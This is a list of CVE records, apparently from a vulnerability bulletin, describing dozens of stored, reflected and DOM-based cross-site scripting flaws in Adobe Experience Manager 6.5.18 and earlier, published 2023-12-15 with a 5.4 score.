adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48511
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48512
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48513
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48514
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48515
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48516
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48517
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48518
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48519
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48520
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48521
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48522
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48523
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48524
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48525
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48526
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48527
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48528
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48529
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48530
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48531
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48532
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48533
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48534
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48535
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48536
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48537
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48538
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48539
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48540
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48541
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48542
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48543
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48544
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48545
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48546
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48547
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48548
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48549
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48550
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48551
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48552
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48553
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48554
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48555
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48556
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48557
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48558
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48559
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48560
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48561
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48562
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48563
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48564
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48565
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48566
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48567
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48568
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48569
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48570
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48571
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48572
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48573
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48574
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48575
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48576
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48577
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48578
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48579
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48580
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48581
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48582
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48583
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48584
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48585
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48586
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48587
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48588
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48589
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48590
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48591
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48592
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48593
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48594
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48595
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48596
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48597
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48598
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48599
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48600
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48601
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48602
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48603
psirt@adobe.com
